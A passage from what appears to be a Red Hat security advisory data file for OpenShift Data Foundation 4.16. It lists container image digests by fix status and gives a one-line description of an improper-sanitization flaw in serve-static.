"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", 